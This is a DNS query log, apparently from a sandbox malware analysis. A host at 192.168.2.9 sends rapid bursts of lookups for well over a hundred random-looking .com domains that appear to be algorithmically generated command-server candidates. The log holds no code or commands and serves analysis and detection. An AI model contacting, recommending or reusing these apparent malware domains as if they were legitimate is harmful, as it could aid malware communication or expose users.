                                                                                                                                                                                                            Nov 11, 2024 18:07:59.801212072 CET192.168.2.91.1.1.10xf74eStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.801400900 CET192.168.2.91.1.1.10x287cStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.801501989 CET192.168.2.91.1.1.10xd9b6Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.801668882 CET192.168.2.91.1.1.10x7335Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.809544086 CET192.168.2.91.1.1.10x5a81Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.810882092 CET192.168.2.91.1.1.10x6ac6Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.811264992 CET192.168.2.91.1.1.10xf078Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.815063953 CET192.168.2.91.1.1.10xa2f8Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.826689959 CET192.168.2.91.1.1.10xd385Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.828425884 CET192.168.2.91.1.1.10xb13cStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.838025093 CET192.168.2.91.1.1.10xb73eStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.875499964 CET192.168.2.91.1.1.10x603fStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.892019987 CET192.168.2.91.1.1.10x6430Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.923141956 CET192.168.2.91.1.1.10x927fStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.925882101 CET192.168.2.91.1.1.10x9dbeStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.926446915 CET192.168.2.91.1.1.10x7e38Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.927943945 CET192.168.2.91.1.1.10xf2b3Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.984435081 CET192.168.2.91.1.1.10x888dStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.995920897 CET192.168.2.91.1.1.10x61fStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.998337030 CET192.168.2.91.1.1.10xba12Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.008785963 CET192.168.2.91.1.1.10x262dStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.009367943 CET192.168.2.91.1.1.10x72dcStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.009656906 CET192.168.2.91.1.1.10x5d36Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.012525082 CET192.168.2.91.1.1.10xd49cStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.019373894 CET192.168.2.91.1.1.10xa905Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.023158073 CET192.168.2.91.1.1.10xf870Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.023590088 CET192.168.2.91.1.1.10x300cStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.023772001 CET192.168.2.91.1.1.10xdb36Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.070718050 CET192.168.2.91.1.1.10x1f8fStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.075064898 CET192.168.2.91.1.1.10x17cStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.852376938 CET192.168.2.91.1.1.10xff3bStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.683496952 CET192.168.2.91.1.1.10x3f07Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.687410116 CET192.168.2.91.1.1.10x8b83Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.688153982 CET192.168.2.91.1.1.10x5cc2Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.696304083 CET192.168.2.91.1.1.10x5e6dStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.699851036 CET192.168.2.91.1.1.10x2a09Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.700330019 CET192.168.2.91.1.1.10xa59dStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.705403090 CET192.168.2.91.1.1.10x94f8Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.715787888 CET192.168.2.91.1.1.10x1066Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.719470024 CET192.168.2.91.1.1.10xec5bStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.720802069 CET192.168.2.91.1.1.10x8216Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.721132040 CET192.168.2.91.1.1.10xb74aStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.721287012 CET192.168.2.91.1.1.10x1f36Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.722676039 CET192.168.2.91.1.1.10xc5efStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.722810030 CET192.168.2.91.1.1.10x21edStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.723553896 CET192.168.2.91.1.1.10x829fStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.723997116 CET192.168.2.91.1.1.10x1c3eStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.724555016 CET192.168.2.91.1.1.10xf4b3Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.724661112 CET192.168.2.91.1.1.10xf428Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.725223064 CET192.168.2.91.1.1.10x131eStandard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.730669022 CET192.168.2.91.1.1.10xc9efStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.733673096 CET192.168.2.91.1.1.10xed1Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.734858036 CET192.168.2.91.1.1.10x9151Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.745229959 CET192.168.2.91.1.1.10x3297Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.746881008 CET192.168.2.91.1.1.10xb10dStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.747107983 CET192.168.2.91.1.1.10xe48cStandard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.750976086 CET192.168.2.91.1.1.10xb915Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.751328945 CET192.168.2.91.1.1.10x1b51Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.752770901 CET192.168.2.91.1.1.10x15adStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.753200054 CET192.168.2.91.1.1.10x4619Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.753428936 CET192.168.2.91.1.1.10x7886Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.766907930 CET192.168.2.91.1.1.10x31f0Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.767261982 CET192.168.2.91.1.1.10x87baStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.767755985 CET192.168.2.91.1.1.10x2550Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.768512011 CET192.168.2.91.1.1.10x4775Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.768788099 CET192.168.2.91.1.1.10x6565Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.769119978 CET192.168.2.91.1.1.10x6c13Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.769314051 CET192.168.2.91.1.1.10x5fa6Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.769429922 CET192.168.2.91.1.1.10x583cStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.777517080 CET192.168.2.91.1.1.10x3235Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.778326988 CET192.168.2.91.1.1.10xf4e0Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.779663086 CET192.168.2.91.1.1.10x312cStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.780620098 CET192.168.2.91.1.1.10xad88Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.780924082 CET192.168.2.91.1.1.10x3a4eStandard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781086922 CET192.168.2.91.1.1.10x7965Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781467915 CET192.168.2.91.1.1.10xa3b3Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781624079 CET192.168.2.91.1.1.10xa684Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781774998 CET192.168.2.91.1.1.10xedd6Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781915903 CET192.168.2.91.1.1.10x8d08Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.782058001 CET192.168.2.91.1.1.10x558Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.782202005 CET192.168.2.91.1.1.10x1ebcStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.785626888 CET192.168.2.91.1.1.10xbbb0Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.785960913 CET192.168.2.91.1.1.10xf37fStandard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.786206007 CET192.168.2.91.1.1.10xfb27Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.787142038 CET192.168.2.91.1.1.10x7b18Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.787442923 CET192.168.2.91.1.1.10x33b9Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.787580967 CET192.168.2.91.1.1.10x39bdStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.790153980 CET192.168.2.91.1.1.10x95cfStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.798264980 CET192.168.2.91.1.1.10x121aStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.798913002 CET192.168.2.91.1.1.10x685dStandard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.293679953 CET192.168.2.91.1.1.10x5898Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.295531988 CET192.168.2.91.1.1.10xb166Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.297997952 CET192.168.2.91.1.1.10x9c6fStandard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.298811913 CET192.168.2.91.1.1.10x5d68Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.304805994 CET192.168.2.91.1.1.10x3dffStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.308789015 CET192.168.2.91.1.1.10x82caStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.312738895 CET192.168.2.91.1.1.10xa2eeStandard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.320918083 CET192.168.2.91.1.1.10xdfe3Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.321012020 CET192.168.2.91.1.1.10x7853Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.321696997 CET192.168.2.91.1.1.10x4683Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.324470997 CET192.168.2.91.1.1.10x171cStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.326215029 CET192.168.2.91.1.1.10xb5d0Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.328289032 CET192.168.2.91.1.1.10xf51aStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.328737974 CET192.168.2.91.1.1.10xcbafStandard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.329168081 CET192.168.2.91.1.1.10x5068Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.329889059 CET192.168.2.91.1.1.10x31daStandard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.329973936 CET192.168.2.91.1.1.10xc770Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.330465078 CET192.168.2.91.1.1.10xd54cStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.331147909 CET192.168.2.91.1.1.10xdca4Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.331465006 CET192.168.2.91.1.1.10x41cbStandard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.331738949 CET192.168.2.91.1.1.10x27Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.332159042 CET192.168.2.91.1.1.10x7bd9Standard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.332974911 CET192.168.2.91.1.1.10x110fStandard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.333672047 CET192.168.2.91.1.1.10x24f5Standard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.334408045 CET192.168.2.91.1.1.10x64d6Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.335521936 CET192.168.2.91.1.1.10xd914Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.369965076 CET192.168.2.91.1.1.10x40edStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.384603024 CET192.168.2.91.1.1.10xdd5bStandard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.384814978 CET192.168.2.91.1.1.10x5359Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.385616064 CET192.168.2.91.1.1.10x6538Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.386665106 CET192.168.2.91.1.1.10xac26Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.386734009 CET192.168.2.91.1.1.10xb288Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.388385057 CET192.168.2.91.1.1.10x6190Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.388570070 CET192.168.2.91.1.1.10xccc1Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.388799906 CET192.168.2.91.1.1.10xbec0Standard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.389120102 CET192.168.2.91.1.1.10x1550Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.389390945 CET192.168.2.91.1.1.10xdbe5Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.390072107 CET192.168.2.91.1.1.10x799dStandard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.390739918 CET192.168.2.91.1.1.10x7f7bStandard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.391558886 CET192.168.2.91.1.1.10xe3e0Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.392317057 CET192.168.2.91.1.1.10x6be5Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.392760038 CET192.168.2.91.1.1.10x404dStandard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.392889977 CET192.168.2.91.1.1.10x311Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.393330097 CET192.168.2.91.1.1.10xb31bStandard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.393544912 CET192.168.2.91.1.1.10xe5f3Standard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.394203901 CET192.168.2.91.1.1.10xea4fStandard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.394399881 CET192.168.2.91.1.1.10x2ee4Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.394835949 CET192.168.2.91.1.1.10x3aeaStandard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.395087004 CET192.168.2.91.1.1.10xd267Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.395447016 CET192.168.2.91.1.1.10x88e5Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.395571947 CET192.168.2.91.1.1.10xd69aStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.396053076 CET192.168.2.91.1.1.10x3d45Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.403640985 CET192.168.2.91.1.1.10xef2cStandard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.403999090 CET192.168.2.91.1.1.10xa602Standard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.404552937 CET192.168.2.91.1.1.10x5372Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.405121088 CET192.168.2.91.1.1.10x40a2Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.411871910 CET192.168.2.91.1.1.10x3fe8Standard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.432199001 CET192.168.2.91.1.1.10xb049Standard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.753042936 CET192.168.2.91.1.1.10x7090Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.753659964 CET192.168.2.91.1.1.10x1dcbStandard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.756577969 CET192.168.2.91.1.1.10x142Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.758441925 CET192.168.2.91.1.1.10xb2d6Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.759733915 CET192.168.2.91.1.1.10x1568Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.763900995 CET192.168.2.91.1.1.10x2f6Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.764559984 CET192.168.2.91.1.1.10xb323Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.776448011 CET192.168.2.91.1.1.10xc276Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.780826092 CET192.168.2.91.1.1.10x244fStandard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.785160065 CET192.168.2.91.1.1.10x5a41Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.794030905 CET192.168.2.91.1.1.10x1322Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.794399977 CET192.168.2.91.1.1.10xb06dStandard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.794823885 CET192.168.2.91.1.1.10xcad5Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.822042942 CET192.168.2.91.1.1.10xfd95Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.822227001 CET192.168.2.91.1.1.10xd7a9Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.822453022 CET192.168.2.91.1.1.10xb712Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.823024035 CET192.168.2.91.1.1.10x1cefStandard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.823458910 CET192.168.2.91.1.1.10xf395Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.827023029 CET192.168.2.91.1.1.10x180Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.827265978 CET192.168.2.91.1.1.10xd677Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.827497005 CET192.168.2.91.1.1.10x3474Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.827653885 CET192.168.2.91.1.1.10xca52Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.827761889 CET192.168.2.91.1.1.10x8e99Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.827927113 CET192.168.2.91.1.1.10x5272Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.828077078 CET192.168.2.91.1.1.10xefb2Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.828211069 CET192.168.2.91.1.1.10xbbfbStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.828361988 CET192.168.2.91.1.1.10x280eStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.828511000 CET192.168.2.91.1.1.10x31eaStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.838187933 CET192.168.2.91.1.1.10xdb80Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.838363886 CET192.168.2.91.1.1.10xd0Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.838525057 CET192.168.2.91.1.1.10xf669Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.838690042 CET192.168.2.91.1.1.10xdabStandard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.843300104 CET192.168.2.91.1.1.10xe9d1Standard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.843476057 CET192.168.2.91.1.1.10xf86dStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.843758106 CET192.168.2.91.1.1.10x373Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.844908953 CET192.168.2.91.1.1.10x457bStandard query (0)qebynyg.comA (IP address)IN (0x0001)false
